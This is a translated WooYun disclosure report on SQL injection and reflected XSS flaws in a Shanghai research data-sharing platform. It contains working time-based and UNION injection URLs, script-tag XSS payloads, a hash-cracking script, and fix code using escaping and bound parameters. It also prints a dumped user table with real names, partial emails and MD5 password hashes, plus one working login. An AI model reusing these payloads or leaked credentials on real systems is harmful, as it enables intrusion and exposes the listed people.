
Vulnerability summary

Defect ID: wooyun-2015-0140553

Title: SQL injection and XSS bundle on a Shanghai data-sharing platform

Related vendor: cncert (National Internet Emergency Center)

Author: Aerfa21

Submitted: 2015-09-15 11:22

Fixed: 2015-11-01 15:34

Published: 2015-11-01 15:34

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed to third-party partner organisation (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-15: Details sent to the vendor; awaiting vendor handling
2015-09-17: Vendor has confirmed; details disclosed to the vendor only
2015-09-27: Details disclosed to core white hats and relevant domain experts
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

Brief description:

See title.

Detailed description:

The Shanghai R&D Public Service Platform effectively integrates the science and technology resources of Shanghai and the Yangtze River Delta region: by opening up instruments, equipment and research bases, sharing scientific data and sci-tech literature, and providing professional technical services, public-interest training, expert consulting and other services, it promotes sci-tech re... It's been a long time since I submitted a bug; continuing the series.
1. SQL injection (unrestricted database dump): dumps user names and passwords; unexpectedly, after authentication succeeded, the page did not exist.

http://**.**.**.**/btin_cms/cnt/moreCount.do?browseParam.channelName=%E4%BA%A7%E4%B8%9A%E5%8A%A8%E6%80%81&browseParam.channelName=%E4%BA%A7%E4%B8%9A%E6%94%BF%E7%AD%96%E6%B3%95%E8%A7%84%E5%92%8C%E6%A0%87%E5%87%86&browseParam.templateName=BTIN_SUMMARY&browseParam.webSymbol=btin') AND (SELECT * FROM (SELECT(SLEEP(5)))UrFp) AND ('TwOE'='TwOE

The injection point is browseParam.webSymbol. This is a time-based blind payload: the `')` closes the parenthesised string literal the value sits in, the MySQL SLEEP(5) subquery delays the response by about five seconds only when the injected SQL is actually executed, and the trailing `AND ('TwOE'='TwOE` re-balances the original closing `')` so the query stays syntactically valid.


sql1.png


Database: btin
Table: tb_cms_user
[18 columns]
+-------------------+---------------+
| Column | Type |
+-------------------+---------------+
| address | varchar(500) |
| availability_date | date |
| check_articles | int(10) |
| created_date | datetime |
| creater | int(10) |
| description | varchar(4000) |
| last_edit_time | datetime |
| last_login_time | datetime |
| login_count | int(10) |
| name | varchar(50) |
| organization | varchar(500) |
| password | varchar(32) |
| phone | varchar(50) |
| role | varchar(20) |
| status | varchar(20) |
| submit_articles | int(10) |
| true_name | varchar(20) |
| user_id | int(10) |
+-------------------+---------------+
Database: btin
Table: tb_cms_user
[15 entries]
+-------------+--------------------------+----------------------------------+-----------+---------+
| login_count | name | password | true_name | user_id |
+-------------+--------------------------+----------------------------------+-----------+---------+
| 3 | chen_jing100@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 陈静 | 32 |
| 8 | dqlv@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | yhju | 33 |
| 626 | fhuang@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 黄菲 | 27 |
| 1 | hwu01@**.**.**.** | a8a3d0e05801ad8e60034365f5c3b6fd | 吴慧 | 19 |
| 2 | hywang1213@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 王慧媛 | 15 |
| 51 | jgren@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 任敬歌 | 23 |
| 160 | jiajia@**.**.**.** | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 贾佳 | 9 |
| 16 | jszhang@**.**.**.** | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 张建设 | 28 |
| 33 | lbgao@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 高柳滨 | 26 |
| 232 | lifecenter@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | sdspb | 1 |
| 148 | liuxiao@**.**.**.** | 0f4237dd33c1e0d930180a402c5403d6 | 刘晓 | 14 |
| 63 | mhli@**.**.**.** | 34018b24aaa7b894f2dee606c9edaf5f | 李明辉 | 18 |
| 85 | mhruan@**.**.**.** | 4ddc1311251a0d11afa4696bec7829b3 | 阮梅花 | 13 |
| 4 | mrq@**.**.**.** | fed86d76f8faeb4ff6e022315aa8251c | 毛汝倩 | 21 |
| 5 | xuerusp@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 王冬冬 | 31 |
+-------------+--------------------------+----------------------------------+-----------+---------+


Tried logging in: authentication succeeded, but the page does not exist (what is going on?!)  chen_jing100@**.**.**.**:111111


sql2.png
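The dumped password column is 32 hex characters wide and eight of the fifteen accounts share one value, which is the shape of an unsalted MD5 store; the successful login with 111111 above fits, because 96e79218965eb72c92a549dd5a330112 is MD5("111111"). The Python below is an added example, not code from the report: it checks the column's shape, groups accounts by shared hash, and looks the hashes up against a small constructed wordlist. The name/hash pairs are copied from the tb_cms_user dump above (mail-domain parts are masked in the report); the wordlist is constructed.

```python
import hashlib

# Name/hash pairs copied from the tb_cms_user dump above (local parts only; domains are masked).
DUMPED_USERS = [
    ("chen_jing100", "96e79218965eb72c92a549dd5a330112"),
    ("dqlv",         "96e79218965eb72c92a549dd5a330112"),
    ("fhuang",       "96e79218965eb72c92a549dd5a330112"),
    ("hwu01",        "a8a3d0e05801ad8e60034365f5c3b6fd"),
    ("hywang1213",   "96e79218965eb72c92a549dd5a330112"),
    ("jgren",        "96e79218965eb72c92a549dd5a330112"),
    ("jiajia",       "b10cbb6c51ac9ec77c8dc9f0bccdd296"),
    ("jszhang",      "b10cbb6c51ac9ec77c8dc9f0bccdd296"),
    ("lbgao",        "96e79218965eb72c92a549dd5a330112"),
    ("lifecenter",   "96e79218965eb72c92a549dd5a330112"),
    ("liuxiao",      "0f4237dd33c1e0d930180a402c5403d6"),
    ("mhli",         "34018b24aaa7b894f2dee606c9edaf5f"),
    ("mhruan",       "4ddc1311251a0d11afa4696bec7829b3"),
    ("mrq",          "fed86d76f8faeb4ff6e022315aa8251c"),
    ("xuerusp",      "96e79218965eb72c92a549dd5a330112"),
]

# Constructed wordlist for the demonstration; a real assessment uses a large one.
WORDLIST = ["123456", "111111", "password", "admin", "12345678"]

HEX_DIGITS = set("0123456789abcdef")


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def looks_like_unsalted_md5(column):
    """True when every value is 32 lowercase hex chars, the shape of hex-encoded MD5."""
    return all(len(h) == 32 and set(h) <= HEX_DIGITS for h in column)


def shared_hash_groups(users):
    """Map hash -> user names sharing it; without a salt, equal hashes mean equal passwords."""
    groups = {}
    for name, h in users:
        groups.setdefault(h, []).append(name)
    return {h: names for h, names in groups.items() if len(names) > 1}


def crack_unsalted_md5(users, wordlist):
    """Hash the wordlist once and look each dumped hash up: one table, no per-user hashing."""
    lookup = {md5_hex(word): word for word in wordlist}
    return {name: lookup[h] for name, h in users if h in lookup}


if __name__ == "__main__":
    print("unsalted-md5 shape:", looks_like_unsalted_md5([h for _, h in DUMPED_USERS]))
    for h, names in shared_hash_groups(DUMPED_USERS).items():
        print(h, "shared by", len(names), "accounts")
    for name, password in crack_unsalted_md5(DUMPED_USERS, WORDLIST).items():
        print(name, "->", password)
```

The lookup-table approach is what makes unsalted hashes cheap to attack: every account that picked 111111 is recovered by one MD5 computation, and the second shared hash (two accounts) is recoverable the same way with a larger list.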


2. XSS (reflected, via the entrezWord parameter of quickSearch.do in several sub-applications)

http://**.**.**.**:80/trace/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/primer/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/hotdata/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/taxonomy/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/nucleotide/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>


xss.png


Proof of vulnerability:

1. SQL injection (can dump sensitive information on 62 companies)

The injection parameter is given as industry; note that the UNION payload below is actually placed in org_name:
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1&PageNo=2


http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162716b71,0x61574876665276567442,0x716b787071)-- &PageNo=2

This is a UNION-based injection with six columns. The three hex literals are the ASCII strings qbqkq, aWHvfRVtB and qkxpq; concatenating a unique marker like this and searching the response for it is how the reflected column is located, and the trailing `-- ` comments out the remainder of the original query.


sql1.png


Let's see whether a lot of sensitive information can be obtained.


sql2.png


sql3.png


2. XSS (non-stored, i.e. reflected; industry parameter of changxing_fwlb.php)

http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%25E4%25BF%25A1%25E6%2581%25AF%25E6%258A%2580%25E6%259C%25AF%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28/xss1/%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E8%B6%85%E7%BA%A7%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83


xss1.png


http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%25E6%2596%25B0%25E8%2583%25BD%25E6%25BA%2590%27%22%28%29%26%25%3E%3CScRiPt%20%3Ealert%28/xss2/%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E5%A4%AA%E9%98%B3%E8%83%BD%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6%E4%B8%AD%E5%BF%83%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%EF%BC%88%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%AA%E9%98%B3%E8%83%BD%E5%85%89%E4%BC%8F%E6%8A%80%E6%9C%AF%E5%88%9B%E6%96%B0%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0%EF%BC%89&PageNo=2


xss2.png
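Both XSS findings (the entrezWord parameter of quickSearch.do and the industry parameter of changxing_fwlb.php) are reflected: the server percent-decodes the query parameter once and writes it into the page without HTML-encoding it. In the changxing_fwlb.php URLs only the Chinese prefix is double-encoded (%25E4...); the script tag itself is single-encoded, so a single decode already yields a live `<ScRiPt >` tag. The Python below is an added example, not code from the report or the platform: it decodes the industry payload exactly once, pushes both payloads through a hypothetical vulnerable template and through the same template with html.escape(), and checks for a script tag. The template markup is an assumption; the payloads are taken from the URLs above.

```python
import html
from urllib.parse import unquote

# Payloads taken from the report URLs (entrezWord and industry parameters respectively).
ENTREZ_PAYLOAD = '"><script>alert(/xss/);</sCript>'
INDUSTRY_PAYLOAD_RAW = ("%25E4%25BF%25A1%25E6%2581%25AF%25E6%258A%2580%25E6%259C%25AF"
                        "%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28/xss1/%29%3C/ScRiPt%3E")


def server_decode(raw):
    """One round of percent-decoding, which is what the web container does for a query parameter."""
    return unquote(raw)


def render_unsafe(value):
    # Hypothetical vulnerable template (assumption): the search term is echoed straight into an attribute.
    return '<input type="text" name="entrezWord" value="%s">' % value


def render_safe(value):
    # Same template, value HTML-encoded for an attribute context (quote=True also escapes " and ').
    return '<input type="text" name="entrezWord" value="%s">' % html.escape(value, quote=True)


def contains_script_tag(markup):
    """Case-insensitive check, since the report's payloads use mixed case (sCript, ScRiPt)."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    decoded = server_decode(INDUSTRY_PAYLOAD_RAW)
    print("after one decode:", decoded)
    for payload in (ENTREZ_PAYLOAD, decoded):
        print("unsafe:", contains_script_tag(render_unsafe(payload)),
              "safe:", contains_script_tag(render_safe(payload)))
```

After one decode the industry value still carries the `%E4%BF%A1...` prefix (the page would show it percent-encoded unless the application decodes a second time, which the report does not establish), but the `<ScRiPt >alert(/xss1/)</ScRiPt>` part is already plain markup. Escaping at the point of output neutralises both payloads regardless of how they were encoded on the way in.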


Fix recommendation:

Parameter filtering. Concretely: build the SQL for webSymbol, industry and org_name with bound parameters (prepared statements) instead of string concatenation, and HTML-encode entrezWord and industry before writing them into the page.
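For the SQL injection, filtering characters out of the parameter is the weaker fix; the robust one is to stop building the query by concatenation and bind the value. The Python below is an added example, not the platform's code: it reconstructs the query shape implied by the blind payload above (the value sits in a parenthesised string literal, hence the `') ... AND ('` boundary) against an in-memory SQLite table and runs the same attacker input through a concatenated and a parameterised version. The table, its rows and the exact query are assumptions; SQLite has no SLEEP(), so the injected condition is `OR ('1'='1` in place of the report's time delay, with the same boundary characters.

```python
import sqlite3

# Constructed stand-in for the channel table behind moreCount.do; the two btin channel
# names are the decoded browseParam.channelName values from the report URL.
ROWS = [
    ("btin", "产业动态"),
    ("btin", "产业政策法规和标准"),
    ("other", "not for btin"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_cms_channel (web_symbol TEXT, channel_name TEXT)")
    conn.executemany("INSERT INTO tb_cms_channel VALUES (?, ?)", ROWS)
    return conn


def channels_vulnerable(conn, web_symbol):
    """String concatenation: the value can close the literal and the parenthesis, as the report's payload does."""
    sql = "SELECT channel_name FROM tb_cms_channel WHERE (web_symbol = '%s')" % web_symbol
    return [row[0] for row in conn.execute(sql)]


def channels_parameterized(conn, web_symbol):
    """Bound parameter: the driver passes the value separately, so quotes in it are data, not syntax."""
    sql = "SELECT channel_name FROM tb_cms_channel WHERE (web_symbol = ?)"
    return [row[0] for row in conn.execute(sql, (web_symbol,))]


# Same boundary as the report's webSymbol payload, with a true OR in place of the SLEEP(5) subquery.
PAYLOAD = "btin') OR ('1'='1"


if __name__ == "__main__":
    conn = make_db()
    print("legit:        ", channels_vulnerable(conn, "btin"))
    print("injected:     ", channels_vulnerable(conn, PAYLOAD))      # every row: the injected OR is true
    print("parameterized:", channels_parameterized(conn, PAYLOAD))   # no row has that literal web_symbol
```

With concatenation the executed statement becomes `WHERE (web_symbol = 'btin') OR ('1'='1')` and the row reserved for another site leaks; with a bound parameter the whole payload is compared as an ordinary string and nothing matches. The same change applies to the industry and org_name parameters of changxing_fwlb.php.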

Copyright notice: when reposting, please credit the source, Aerfa21@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-09-17 15:33

Vendor reply:

CNVD confirmed and reproduced the described situation and has passed it via CNCERT to the Shanghai branch centre, which will coordinate handling with the unit that administers the website. Scored on multiple risk factors: rank 12

Latest status:

None yet